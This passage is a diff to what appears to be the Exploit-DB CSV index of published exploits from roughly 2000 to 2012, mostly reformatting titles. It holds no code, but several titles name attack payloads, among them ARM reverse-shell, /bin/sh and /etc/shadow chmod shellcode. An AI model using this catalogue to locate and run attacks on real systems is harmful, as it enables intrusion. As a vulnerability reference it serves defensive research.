20185,platforms/linux/local/20185.c,"RedHat 6 glibc/locale Subsystem Format String",2000-09-06,warning3,linux,local,0 20186,platforms/solaris/local/20186.c,"Solaris 2.6/7.0 /locale Subsystem Format String",2000-11-02,warning3,solaris,local,0 20187,platforms/immunix/local/20187.c,"Immunix OS 6.2 LC glibc format string",2000-09-04,"Kil3r of Lam3rZ",immunix,local,0 -20188,platforms/solaris/local/20188.c,"Solaris 2.6/7.0 - ""eject"" Exploit for locale subsystem format string",2000-09-08,warning3,solaris,local,0 +20188,platforms/solaris/local/20188.c,"Solaris 2.6/7.0 - _eject_ Exploit for locale subsystem format string",2000-09-08,warning3,solaris,local,0 20189,platforms/unix/local/20189.c,"Libc locale Exploit (1)",2000-09-04,Synnergy.net,unix,local,0 20190,platforms/unix/local/20190.c,"Libc locale Exploit (2)",2000-09-04,anonymous,unix,local,0 20191,platforms/bsd/local/20191.c,"Juergen Weigert screen 3.9 User Supplied Format String Vulnerability",2000-09-05,IhaQueR@IRCnet,bsd,local,0 @@ -17545,7 +17545,7 @@ id,file,description,date,author,platform,type,port 20210,platforms/linux/remote/20210.txt,"Apache 1.3.12 WebDAV Directory Listings Vulnerability",2000-09-07,Mnemonix,linux,remote,0 20211,platforms/windows/remote/20211.c,"Mobius DocumentDirect for the Internet 1.2 - Buffer Overflow Vulnerabilities",2000-09-08,wildcoyote,windows,remote,0 20212,platforms/unix/local/20212.c,"GNOME esound 0.2.19 Unix Domain Socket Race Condition Vulnerability",2000-08-31,"Kris Kennaway",unix,local,0 -20213,platforms/aix/local/20213.txt,"AIX 4.2/4.3 netstat -Z Statistic Clearing Vulnerability",2000-09-03,"alex medvedev",aix,local,0 +20213,platforms/aix/local/20213.txt,"AIX 4.2/4.3 - netstat -Z Statistic Clearing Vulnerability",2000-09-03,"alex medvedev",aix,local,0 20214,platforms/windows/remote/20214.pl,"Check Point Software Firewall-1 3.0/1 4.0 Session Agent Impersonation Vulnerability",1998-09-24,"Andrew Danforth",windows,remote,0 20215,platforms/multiple/remote/20215.pl,"Check Point Software Firewall-1 3.0/1 4.0/1 4.1 Session Agent Dictionary Attack (1)",2000-08-15,"Nelson Brito",multiple,remote,0 20216,platforms/multiple/remote/20216.sh,"Check Point Software Firewall-1 3.0/1 4.0/1 4.1 Session Agent Dictionary Attack (2)",2000-10-01,"Gregory Duchemin",multiple,remote,0 @@ -17569,7 +17569,7 @@ id,file,description,date,author,platform,type,port 20234,platforms/multiple/remote/20234.txt,"extent technologies rbs isp 2.5 - Directory Traversal Vulnerability",2000-09-21,anon,multiple,remote,8002 20235,platforms/windows/remote/20235.pl,"Cisco Secure ACS for Windows NT 2.42 - Buffer Overflow Vulnerability",2000-09-21,blackangels,windows,remote,0 20236,platforms/linux/remote/20236.txt,"S.u.S.E. Linux 6.3/6.4 Installed Package Disclosure Vulnerability",2000-09-21,t0maszek,linux,remote,0 -20237,platforms/linux/remote/20237.c,"UoW Pine 4.0.4/4.10/4.21 - ""From:"" Field Buffer Overflow Vulnerability",2000-09-23,Arkane,linux,remote,0 +20237,platforms/linux/remote/20237.c,"UoW Pine 4.0.4/4.10/4.21 - _From:_ Field Buffer Overflow Vulnerability",2000-09-23,Arkane,linux,remote,0 20238,platforms/cgi/remote/20238.txt,"Alabanza Control Panel 3.0 Domain Modification Vulnerability",2000-09-24,"Weihan Leow",cgi,remote,0 20239,platforms/multiple/remote/20239.txt,"HP OpenView Network Node Manager 6.10 SNMP DoS Vulnerability",2000-09-26,DCIST,multiple,remote,0 20240,platforms/windows/remote/20240.txt,"Microsoft Windows Media Player 7 Embedded OCX Control Vulnerability",2000-09-26,"Ussr Labs",windows,remote,0 @@ -17651,10 +17651,10 @@ id,file,description,date,author,platform,type,port 20320,platforms/windows/webapps/20320.txt,"Zoho BugTracker Multiple Stored XSS Vulnerabilities",2012-08-07,LiquidWorm,windows,webapps,0 20321,platforms/windows/remote/20321.rb,"Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution",2012-08-08,metasploit,windows,remote,0 20322,platforms/multiple/remote/20322.html,"Sun HotJava Browser 3 - Arbitrary DOM Access Vulnerability",2000-10-25,"Georgi Guninski",multiple,remote,0 -20323,platforms/hardware/remote/20323.txt,"Cisco IOS 12 Software ""?/"" HTTP Request DoS Vulnerability",2000-10-25,"Alberto Solino",hardware,remote,0 +20323,platforms/hardware/remote/20323.txt,"Cisco IOS 12 Software _?/_ HTTP Request DoS Vulnerability",2000-10-25,"Alberto Solino",hardware,remote,0 20324,platforms/windows/remote/20324.txt,"iPlanet Certificate Management System 4.2 - Directory Traversal",2000-10-25,CORE-SDI,windows,remote,0 20325,platforms/windows/remote/20325.txt,"Netscape Directory Server 4.12 - Directory Server Directory Traversal Vulnerability",2000-10-25,CORE-SDI,windows,remote,0 -20326,platforms/unix/local/20326.sh,"ntop 1.x -i Local Format String Vulnerability",2000-10-18,"Paul Starzetz",unix,local,0 +20326,platforms/unix/local/20326.sh,"ntop 1.x - -i Local Format String Vulnerability",2000-10-18,"Paul Starzetz",unix,local,0 20327,platforms/unix/remote/20327.txt,"GNU Ffingerd 1.19 Username Validity Disclosure Vulnerability",1999-08-23,"Eilon Gishri",unix,remote,0 20328,platforms/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service Vulnerability",2000-10-20,"Knud Erik Højgaard",hardware,dos,0 20329,platforms/hp-ux/local/20329.sh,"HP-UX 10.20/11.0 crontab /tmp File Vulnerability",2000-10-20,"Kyong-won Cho",hp-ux,local,0 @@ -17736,7 +17736,7 @@ id,file,description,date,author,platform,type,port 20405,platforms/cgi/remote/20405.pl,"DCForum 1-6 - Arbitrary File Disclosure Vulnerability",2000-11-14,steeLe,cgi,remote,0 20406,platforms/multiple/remote/20406.txt,"RealServer 5.0/6.0/7.0 Memory Contents Disclosure Vulnerability",2000-11-16,CORE-SDI,multiple,remote,0 20407,platforms/windows/local/20407.c,"NetcPlus SmartServer3 3.75 Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0 -20408,platforms/cgi/remote/20408.txt,"Markus Triska CGIForum 1.0 - ""thesection"" Directory Traversal Vulnerability",2000-11-20,zorgon,cgi,remote,0 +20408,platforms/cgi/remote/20408.txt,"Markus Triska CGIForum 1.0 - _thesection_ Directory Traversal Vulnerability",2000-11-20,zorgon,cgi,remote,0 20409,platforms/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0 20410,platforms/unix/local/20410.cpp,"Jan Hubicka Koules 1.4 Svgalib Buffer Overflow Vulnerability",2000-11-20,Synnergy.net,unix,local,0 20411,platforms/linux/local/20411.c,"Oracle 8.x cmctl Buffer Overflow Vulnerability",2000-11-20,anonymous,linux,local,0 @@ -17763,10 +17763,10 @@ id,file,description,date,author,platform,type,port 20434,platforms/cgi/remote/20434.txt,"Miva htmlscript 2.x - Directory Traversal Vulnerability",1998-01-26,"Dennis Moore",cgi,remote,0 20435,platforms/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x & NCSA httpd 1.x - test-cgi Directory Listing Vulnerability",1996-04-01,@stake,cgi,remote,0 20436,platforms/unix/local/20436.sh,"Mac OS X 10_HP-UX 9/10/11_Mandriva 6/7_RedHat 5/6_SCO 5_IRIX 6 Shell Redirection Race Condition",2000-01-02,proton,unix,local,0 -20437,platforms/windows/dos/20437.c,"Windows 3.11/95/NT 4.0/NT 3.5.1 - ""Out Of Band"" Data Denial of Service (1)",1997-07-05,_eci,windows,dos,0 -20438,platforms/windows/dos/20438.pl,"Windows 3.11/95/NT 4.0/NT 3.5.1 - ""Out Of Band"" Data Denial of Service (2)",1997-05-07,_eci,windows,dos,0 -20439,platforms/windows/dos/20439.pl,"Windows 3.11/95/NT 4.0/NT 3.5.1 - ""Out Of Band"" Data Denial of Service (3)",1997-05-07,_eci,windows,dos,0 -20440,platforms/windows/dos/20440.irc,"Windows 3.11/95/NT 4.0/NT 3.5.1 - ""Out Of Band"" Data Denial of Service (4)",1997-05-07,"maddog and lerper",windows,dos,0 +20437,platforms/windows/dos/20437.c,"Windows 3.11/95/NT 4.0/NT 3.5.1 - _Out Of Band_ Data Denial of Service (1)",1997-07-05,_eci,windows,dos,0 +20438,platforms/windows/dos/20438.pl,"Windows 3.11/95/NT 4.0/NT 3.5.1 - _Out Of Band_ Data Denial of Service (2)",1997-05-07,_eci,windows,dos,0 +20439,platforms/windows/dos/20439.pl,"Windows 3.11/95/NT 4.0/NT 3.5.1 - _Out Of Band_ Data Denial of Service (3)",1997-05-07,_eci,windows,dos,0 +20440,platforms/windows/dos/20440.irc,"Windows 3.11/95/NT 4.0/NT 3.5.1 - _Out Of Band_ Data Denial of Service (4)",1997-05-07,"maddog and lerper",windows,dos,0 20441,platforms/multiple/remote/20441.txt,"IBM Net.Data 7.0 Path Disclosure Vulnerability",2000-11-29,"Chad Kalmes",multiple,remote,0 20442,platforms/cgi/remote/20442.html,"Greg Matthews Classifieds.cgi 1.0 Hidden Variable Vulnerability",1998-12-15,anonymous,cgi,remote,0 20443,platforms/osx/local/20443.sh,"Tunnelblick - Local Root Exploit (2)",2012-08-11,zx2c4,osx,local,0 @@ -17868,11 +17868,11 @@ id,file,description,date,author,platform,type,port 20544,platforms/php/webapps/20544.txt,"xt:Commerce <= 3.04 SP2.1 - Time Based Blind SQL Injection",2012-08-15,stoffline.com,php,webapps,0 20545,platforms/windows/webapps/20545.txt,"Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities",2012-08-15,loneferret,windows,webapps,0 20546,platforms/php/webapps/20546.txt,"sphpforum 0.4 - Multiple Vulnerabilities",2012-08-15,loneferret,php,webapps,0 -20547,platforms/windows/remote/20547.txt,"Internet Explorer Time Element Memory Corruption Exploit (MS11-050)",2012-08-16,Ciph3r,windows,remote,0 +20547,platforms/windows/remote/20547.txt,"Microsoft Internet Explorer - Time Element Memory Corruption Exploit (MS11-050)",2012-08-16,Ciph3r,windows,remote,0 20549,platforms/php/webapps/20549.py,"Roundcube Webmail 0.8.0 - Stored XSS",2012-08-16,"Shai rod",php,webapps,0 20550,platforms/php/webapps/20550.txt,"ProQuiz 2.0.2 - CSRF Vulnerability",2012-08-16,DaOne,php,webapps,0 20551,platforms/linux/remote/20551.pl,"E-Mail Security Virtual Appliance (ESVA) Remote Execution",2012-08-16,iJoo,linux,remote,0 -20552,platforms/windows/dos/20552.html,"Internet Explorer 4.0_Outlook 2000/5.5 MSHTML.DLL Crash Vulnerability",2001-01-15,"Thor Larholm",windows,dos,0 +20552,platforms/windows/dos/20552.html,"Microsoft Internet Explorer 4.0_ Outlook 2000/5.5 - MSHTML.DLL Crash Vulnerability",2001-01-15,"Thor Larholm",windows,dos,0 20553,platforms/windows/remote/20553.html,"Microsoft Windows Media Player 7.0 - (.wmz) Arbitrary Java Applet Vulnerability",2001-01-15,"Georgi Guninski",windows,remote,0 20554,platforms/linux/local/20554.sh,"SuSE 6.x/7.0 MkDir Error Handling rctab Race Condition Vulnerability (1)",2001-01-13,IhaQueR,linux,local,0 20555,platforms/linux/local/20555.sh,"SuSE 6.x/7.0 MkDir Error Handling rctab Race Condition Vulnerability (2)",2001-01-13,IhaQueR,linux,local,0 @@ -17925,7 +17925,7 @@ id,file,description,date,author,platform,type,port 20601,platforms/multiple/remote/20601.txt,"iweb hyperseek 2000 - Directory Traversal Vulnerability",2001-01-28,"MC GaN",multiple,remote,0 20602,platforms/solaris/remote/20602.c,"Solaris x86 2.4/2.5 nlps_server Buffer Overflow Vulnerability",1998-04-01,"Last Stage of Delirium",solaris,remote,0 20603,platforms/solaris/local/20603.c,"Solaris 7/8 ximp40 Library Buffer Overflow Vulnerability",2001-01-31,UNYUN,solaris,local,0 -20604,platforms/linux/local/20604.sh,"Debian 2.2_S.u.S.E 6.3/6.4/7.0 man -l Format String Vulnerability",2001-01-31,IhaQueR,linux,local,0 +20604,platforms/linux/local/20604.sh,"Debian 2.2_ S.u.S.E 6.3/6.4/7.0 - man -l Format String Vulnerability",2001-01-31,IhaQueR,linux,local,0 20605,platforms/windows/remote/20605.cpp,"Apple Quicktime plugin - Windows 4.1.2 (Japanese) Remote Overflow Vulnerability",2012-08-18,UNYUN,windows,remote,0 20606,platforms/cgi/remote/20606.pl,"qDecoder 4.x/5.x - Remote Buffer Overflow Vulnerability",2000-03-26,"Jin Ho You",cgi,remote,0 20607,platforms/windows/remote/20607.txt,"goahead webserver 2.0/2.1 - Directory Traversal Vulnerability",2001-02-02,"Sergey Nenashev",windows,remote,0 @@ -17997,7 +17997,7 @@ id,file,description,date,author,platform,type,port 20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary PHP File Upload Vulnerability",2012-08-22,metasploit,php,webapps,0 20675,platforms/php/webapps/20675.py,"uebimiau webmail 2.7.2 - Stored XSS",2012-08-20,"Shai rod",php,webapps,0 20676,platforms/windows/remote/20676.rb,"Sysax Multi-Server 5.64 Create Folder Buffer Overflow",2012-08-20,"Matt Andreko",windows,remote,0 -20677,platforms/windows/webapps/20677.txt,"IOServer ""Root Directory"" Trailing Backslash Multiple Vulnerabilities",2012-08-20,hinge,windows,webapps,0 +20677,platforms/windows/webapps/20677.txt,"IOServer _Root Directory_ Trailing Backslash Multiple Vulnerabilities",2012-08-20,hinge,windows,webapps,0 20678,platforms/unix/local/20678.c,"Rob Malda ASCDC 0.3 - Buffer Overflow Vulnerability (1)",2001-03-08,anonymous,unix,local,0 20679,platforms/unix/local/20679.c,"Rob Malda ASCDC 0.3 - Buffer Overflow Vulnerability (2)",2001-03-08,"the itch",unix,local,0 20680,platforms/windows/remote/20680.html,"Microsoft Internet Explorer 5.0.1/5.5/6.0 Telnet Client File Overwrite Vulnerability",2001-03-09,"Oliver Friedrichs",windows,remote,0 @@ -18074,11 +18074,11 @@ id,file,description,date,author,platform,type,port 20766,platforms/unix/local/20766.c,"SGI IRIX 6.5_Solaris 7.0/8 CDE dtsession Buffer Overflow Vulnerability",2001-04-11,"Last Stage of Delirium",unix,local,0 20767,platforms/solaris/local/20767.c,"Solaris 2.5/2.6/7.0/8 kcms_configure KCMS_PROFILES Buffer Overflow Vulnerability (1)",1999-12-01,"Last Stage of Delirium",solaris,local,0 20768,platforms/solaris/local/20768.c,"Solaris 2.5/2.6/7.0/8 kcms_configure KCMS_PROFILES Buffer Overflow Vulnerability (2)",1999-12-01,"Last Stage of Delirium",solaris,local,0 -20769,platforms/unix/local/20769.txt,"Siemens Reliant UNIX 5.4 ppd -T Race Condition Vulnerability",2001-04-14,"Ruiz Garcia",unix,local,0 +20769,platforms/unix/local/20769.txt,"Siemens Reliant UNIX 5.4 - ppd -T Race Condition Vulnerability",2001-04-14,"Ruiz Garcia",unix,local,0 20770,platforms/windows/dos/20770.txt,"GoAhead Software GoAhead Webserver (Windows) 2.1 - Denial of Service",2001-04-17,nemesystm,windows,dos,0 20771,platforms/windows/dos/20771.txt,"Simpleserver WWW 1.0.x AUX Directory Denial of Service Vulnerability",2001-04-17,nemesystm,windows,dos,0 -20772,platforms/solaris/local/20772.c,"Solaris 2.5/2.6/7.0/8 mailx -F Buffer Overflow Vulnerability (1)",2001-04-01,"Pablo Sor",solaris,local,0 -20773,platforms/solaris/local/20773.c,"Solaris 2.5/2.6/7.0/8 mailx -F Buffer Overflow Vulnerability (2)",2001-04-15,"Pablo Sor",solaris,local,0 +20772,platforms/solaris/local/20772.c,"Solaris 2.5/2.6/7.0/8 - mailx -F Buffer Overflow Vulnerability (1)",2001-04-01,"Pablo Sor",solaris,local,0 +20773,platforms/solaris/local/20773.c,"Solaris 2.5/2.6/7.0/8 - mailx -F Buffer Overflow Vulnerability (2)",2001-04-15,"Pablo Sor",solaris,local,0 20774,platforms/windows/remote/20774.txt,"Microsoft Internet Explorer 5.5 CLSID File Execution Vulnerability",2001-04-17,"Georgi Guninski",windows,remote,0 20775,platforms/windows/remote/20775.txt,"Netscape SmartDownload 1.3 - Buffer Overflow Vulnerability",2001-04-13,"Craig Davison",windows,remote,0 20776,platforms/linux/local/20776.c,"Samba 2.0.x Insecure TMP file Symbolic Link Vulnerability",2001-04-17,"Gabriel Maggiotti",linux,local,0 @@ -18088,7 +18088,7 @@ id,file,description,date,author,platform,type,port 20780,platforms/cgi/remote/20780.c,"CrossWind CyberScheduler 2.1 websyncd Remote Buffer Overflow Vulnerability",2001-04-17,"Enrique A.",cgi,remote,0 20781,platforms/linux/local/20781.txt,"SUSE 7.0 KFM Insecure TMP File Creation Vulnerability",2001-04-18,"Paul Starzetz",linux,local,0 20782,platforms/windows/remote/20782.eml,"Microsoft Internet Explorer 5.0/5.5 and OE 5.5 XML Stylesheets Active Scripting Vulnerability",2001-04-20,"Georgi Guninski",windows,remote,0 -20783,platforms/windows/remote/20783.txt,"Rit Research Labs ""The Bat!"" 1.x Missing Linefeeds DoS Vulnerability",2001-04-18,3APA3A,windows,remote,0 +20783,platforms/windows/remote/20783.txt,"Rit Research Labs _The Bat!_ 1.x Missing Linefeeds DoS Vulnerability",2001-04-18,3APA3A,windows,remote,0 20784,platforms/windows/dos/20784.cpp,"WireShark 1.8.2 & 1.6.0 - Buffer Overflow PoC (0day)",2012-08-24,X-h4ck,windows,dos,0 20785,platforms/php/webapps/20785.txt,"Ad Manager Pro Multiple Vulnerabilities",2012-08-24,"Yakir Wizman",php,webapps,0 20787,platforms/php/webapps/20787.txt,"Text Exchange Pro (index.php page) Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 @@ -18147,7 +18147,7 @@ id,file,description,date,author,platform,type,port 20840,platforms/windows/remote/20840.txt,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (6)",2001-05-15,A.Ramos,windows,remote,0 20841,platforms/windows/remote/20841.txt,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (7)",2001-05-15,"Gary O'Leary-Steele",windows,remote,0 20842,platforms/windows/remote/20842.txt,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (8)",2001-05-15,Roelof,windows,remote,0 -20843,platforms/linux/local/20843.txt,"Immunix OS 6.2/7.0_Redhat 5.2/6.2/7.0_S.u.S.E 6.x/7.0/7.1 Man -S Heap Overflow",2001-05-13,"zenith parsec",linux,local,0 +20843,platforms/linux/local/20843.txt,"Immunix OS 6.2/7.0_ Redhat 5.2/6.2/7.0_ S.u.S.E 6.x/7.0/7.1 Man -S - Heap Overflow",2001-05-13,"zenith parsec",linux,local,0 20844,platforms/osx/dos/20844.txt,"Apple Personal Web Sharing 1.1/1.5/1.5.5 - Remote DoS Vulnerability",2001-05-10,"Jass Seljamaa",osx,dos,0 20845,platforms/osx/remote/20845.txt,"Maxum Rumpus FTP Server 1.3.2/1.3.4/2.0.3 dev Remote DoS",2001-05-15,"Jass Seljamaa",osx,remote,0 20846,platforms/windows/dos/20846.pl,"Microsoft IIS 4.0/5.0 FTP Denial of Service Vulnerability",2000-05-14,"Nelson Bunker",windows,dos,0 @@ -18233,7 +18233,7 @@ id,file,description,date,author,platform,type,port 20931,platforms/windows/remote/20931.c,"Microsoft Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (2)",2001-06-21,hsj,windows,remote,0 20932,platforms/windows/remote/20932.sh,"Microsoft Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (3)",2001-06-18,mat,windows,remote,0 20933,platforms/windows/remote/20933.pl,"Microsoft Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (4)",2001-06-18,blackangels,windows,remote,0 -20934,platforms/windows/remote/20934.txt,"Internet Software Solutions Air Messenger LAN Server 3.4.2 Path Disclosure Vulnerability",2001-06-18,"SNS Research",windows,remote,0 +20934,platforms/windows/remote/20934.txt,"Internet Software Solutions Air Messenger LAN Server 3.4.2 - Path Disclosure Vulnerability",2001-06-18,"SNS Research",windows,remote,0 20935,platforms/cgi/remote/20935.pl,"Microburst uDirectory 2.0 - Remote Command Execution Vulnerability",2001-06-18,"Igor Dobrovitski",cgi,remote,0 20936,platforms/linux/remote/20936.c,"NetSQL 1.0 - Remote Buffer Overflow Vulnerability",2001-06-15,"Sergio Monteiro",linux,remote,0 20937,platforms/irix/local/20937.c,"SGI Performance Co-Pilot 2.1.x/2.2 pmpost Symbolic Link Vulnerability",2001-06-18,IhaQueR,irix,local,0 @@ -18312,7 +18312,7 @@ id,file,description,date,author,platform,type,port 21012,platforms/multiple/dos/21012.c,"ID Software Quake 1.9 - Denial of Service Vulnerability",2001-07-17,"Andy Gavin",multiple,dos,0 21014,platforms/linux/local/21014.c,"Slackware 7.0/7.1/8.0 - Manual Page Cache File Creation Vulnerability",2001-07-17,josh,linux,local,0 21015,platforms/hardware/remote/21015.pl,"Check Point Firewall-1 4 SecureRemote Network Information Leak Vulnerability",2001-07-17,"Haroon Meer & Roelof Temmingh",hardware,remote,0 -21016,platforms/windows/remote/21016.c,"ID Software Quake 3 - ""smurf attack"" Denial of Service Vulnerability",2001-07-17,"Andy Gavin",windows,remote,0 +21016,platforms/windows/remote/21016.c,"ID Software Quake 3 - _smurf attack_ Denial of Service Vulnerability",2001-07-17,"Andy Gavin",windows,remote,0 21019,platforms/linux/remote/21019.txt,"Horde 1.2.x/2.1.3 and Imp 2.2.x/3.1.2 File Disclosure Vulnerability",2001-07-13,"Caldera Open Linux",linux,remote,0 21020,platforms/multiple/local/21020.c,"NetWin DMail 2.x_SurgeFTP 1.0/2.0 Weak Password Encryption Vulnerability",2001-07-20,byterage,multiple,local,0 21021,platforms/unix/remote/21021.pl,"SSH2 3.0 Short Password Login Vulnerability",2001-07-21,hypoclear,unix,remote,0 @@ -18538,8 +18538,8 @@ id,file,description,date,author,platform,type,port 21250,platforms/php/webapps/21250.txt,"Webify Blog Arbitrary File Deletion Vulnerability",2012-09-11,JIKO,php,webapps,0 21251,platforms/php/webapps/21251.txt,"akcms 4.2.4 - Information Disclosure Vulnerability",2012-09-11,L0n3ly-H34rT,php,webapps,0 21252,platforms/arm/shellcode/21252.asm,"(Raspberry Pi) Linux/ARM - reverse_shell(tcp_10.1.1.2_0x1337)",2012-09-11,midnitesnake,arm,shellcode,0 -21253,platforms/arm/shellcode/21253.asm,"(Raspberry Pi) Linux/ARM - execve(""/bin/sh""_ [0]_ [0 vars]) (30 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 -21254,platforms/arm/shellcode/21254.asm,"(Raspberry Pi) Linux/ARM - chmod(""/etc/shadow""_ 0777) (41 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 +21253,platforms/arm/shellcode/21253.asm,"(Raspberry Pi) Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) (30 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 +21254,platforms/arm/shellcode/21254.asm,"(Raspberry Pi) Linux/ARM - chmod(_/etc/shadow__ 0777) (41 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 21257,platforms/cgi/webapps/21257.txt,"AHG Search Engine 1.0 - Search.CGI Arbitrary Command Execution Vulnerability",2002-01-29,"Aleksey Sintsov",cgi,webapps,0 21258,platforms/linux/local/21258.bat,"Microsoft Windows 2000/NT 4 NTFS File Hiding Vulnerability",2002-01-29,"Hans Somers",linux,local,0 21259,platforms/linux/local/21259.java,"Sun Java Virtual Machine 1.2.2/1.3.1 Segmentation Violation Vulnerability",2002-01-30,"Taeho Oh",linux,local,0 @@ -18690,11 +18690,11 @@ id,file,description,date,author,platform,type,port 21409,platforms/unix/dos/21409.pl,"PsyBNC 2.3 Oversized Passwords Denial of Service Vulnerability",2002-04-22,DVDMAN,unix,dos,0 21410,platforms/windows/remote/21410.pl,"Matu FTP 1.74 Client Buffer Overflow Vulnerability",2002-04-23,Kanatoko,windows,remote,0 21411,platforms/cgi/webapps/21411.txt,"vqServer 1.9.x CGI Demo Program Script Injection Vulnerability",2002-04-21,"Matthew Murphy",cgi,webapps,0 -21412,platforms/unix/remote/21412.txt,"Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability",2002-04-23,"CHINANSL Security Team",unix,remote,0 +21412,platforms/unix/remote/21412.txt,"Apache Tomcat 4.0/4.1 - Servlet Path Disclosure Vulnerability",2002-04-23,"CHINANSL Security Team",unix,remote,0 21413,platforms/multiple/dos/21413.txt,"National Instruments LabVIEW 5.1.1/6.0/6.1 HTTP Request Denial of Service Vulnerability",2002-04-19,"Steve Zins",multiple,dos,0 21414,platforms/unix/local/21414.c,"GNU Screen 3.9.x Braille Module Buffer Overflow Vulnerability",2002-04-23,"Gobbles Security",unix,local,0 21415,platforms/cgi/remote/21415.txt,"CGIScript.NET csMailto Hidden Form Field Remote Command Execution Vulnerability",2002-04-23,"Steve Gustin",cgi,remote,0 -21416,platforms/windows/dos/21416.txt,"Internet Explorer 5/6 Recursive JavaScript Event Denial of Service Vulnerability",2002-04-24,"Berend-Jan Wever",windows,dos,0 +21416,platforms/windows/dos/21416.txt,"Microsoft Internet Explorer 5/6 - Recursive JavaScript Event Denial of Service Vulnerability",2002-04-24,"Berend-Jan Wever",windows,dos,0 21417,platforms/hardware/webapps/21417.py,"Thomson Wireless VoIP Cable Modem Auth Bypass",2012-09-20,"Glafkos Charalambous ",hardware,webapps,0 21418,platforms/php/webapps/21418.txt,"Manhali 1.8 - Local File Inclusion Vulnerability",2012-09-20,L0n3ly-H34rT,php,webapps,0 21420,platforms/linux/local/21420.c,"Sudo 1.6.x Password Prompt Heap Overflow Vulnerability",2001-11-01,MaXX,linux,local,0 @@ -18767,9 +18767,9 @@ id,file,description,date,author,platform,type,port 21487,platforms/cgi/webapps/21487.pl,"Image Display System 0.8.1 - Directory Existence Disclosure Vulnerability",2002-05-28,isox,cgi,webapps,0 21488,platforms/novell/remote/21488.txt,"Netscape Enterprise Web Server for Netware 4/5 5.0 Information Disclosure",2002-05-29,Procheckup,novell,remote,0 21489,platforms/sco/local/21489.txt,"Caldera OpenServer 5.0.5/5.0.6 SCOAdmin Symbolic Link Vulnerability",2002-05-29,"Kevin Finisterre",sco,local,0 -21490,platforms/multiple/remote/21490.txt,"Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 -21491,platforms/multiple/remote/21491.txt,"Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 -21492,platforms/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 +21490,platforms/multiple/remote/21490.txt,"Apache Tomcat 3.2.3/3.2.4 - Source.JSP Malformed Request Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 +21491,platforms/multiple/remote/21491.txt,"Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Path Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 +21492,platforms/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 - RealPath.JSP Malformed Request Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 21493,platforms/cfm/webapps/21493.txt,"Gafware CFXImage 1.6.4/1.6.6 ShowTemp File Disclosure Vulnerability",2002-05-29,"Richard Brain",cfm,webapps,0 21494,platforms/cgi/webapps/21494.txt,"CGIScript.net csPassword.CGI 1.0 Information Disclosure Vulnerability",2002-05-30,"Steve Gustin",cgi,webapps,0 21495,platforms/cgi/webapps/21495.txt,"CGIScript.net csPassword.CGI 1.0 HTAccess File Modification Vulnerability",2002-05-30,"Steve Gustin",cgi,webapps,0 @@ -18810,7 +18810,7 @@ id,file,description,date,author,platform,type,port 21531,platforms/unix/dos/21531.txt,"Caldera OpenServer 5.0.x XSCO Color Database File Heap Overflow Vulnerability",2002-06-11,kf,unix,dos,0 21532,platforms/cgi/webapps/21532.txt,"CGIScript.net csNews 1.0 Double URL Encoding Unauthorized Administrative Access",2002-06-11,"Steve Gustin",cgi,webapps,0 21533,platforms/cgi/webapps/21533.txt,"CGIScript.net csNews 1.0 Header File Type Restriction Bypass Vulnerability",2002-06-11,"Steve Gustin",cgi,webapps,0 -21534,platforms/linux/dos/21534.jsp,"Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability",2002-06-12,"Marc Schoenefeld",linux,dos,0 +21534,platforms/linux/dos/21534.jsp,"Apache Tomcat 3/4 - JSP Engine Denial of Service Vulnerability",2002-06-12,"Marc Schoenefeld",linux,dos,0 21535,platforms/cgi/webapps/21535.txt,"MakeBook 2.2 Form Field Input Validation Vulnerability",2002-06-12,b0iler,cgi,webapps,0 21536,platforms/windows/dos/21536.jsp,"Macromedia JRun 3/4 JSP Engine Denial of Service Vulnerability",2002-06-12,"Marc Schoenefeld",windows,dos,0 21537,platforms/linux/dos/21537.c,"Ayman Akt IRCIT 0.3.1 Invite Message Remote Buffer Overflow Vulnerability",2002-06-12,gobbles,linux,dos,0 @@ -18824,7 +18824,7 @@ id,file,description,date,author,platform,type,port 21545,platforms/jsp/webapps/21545.txt,"JAMF Casper Suite MDM CSRF Vulnerability",2012-09-27,"Jacob Holcomb",jsp,webapps,0 21546,platforms/windows/webapps/21546.py,"Trend Micro Control Manager 5.5/6.0 AdHocQuery BlindSQL Injection (post-auth)",2012-09-27,otoy,windows,webapps,0 21547,platforms/windows/local/21547.txt,"Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability",2012-09-27,X-Cisadane,windows,local,0 -21548,platforms/cfm/remote/21548.txt,"ColdFusion MX Missing Template Cross-Site Scripting Vulnerability",2002-06-13,Macromedia,cfm,remote,0 +21548,platforms/cfm/remote/21548.txt,"ColdFusion 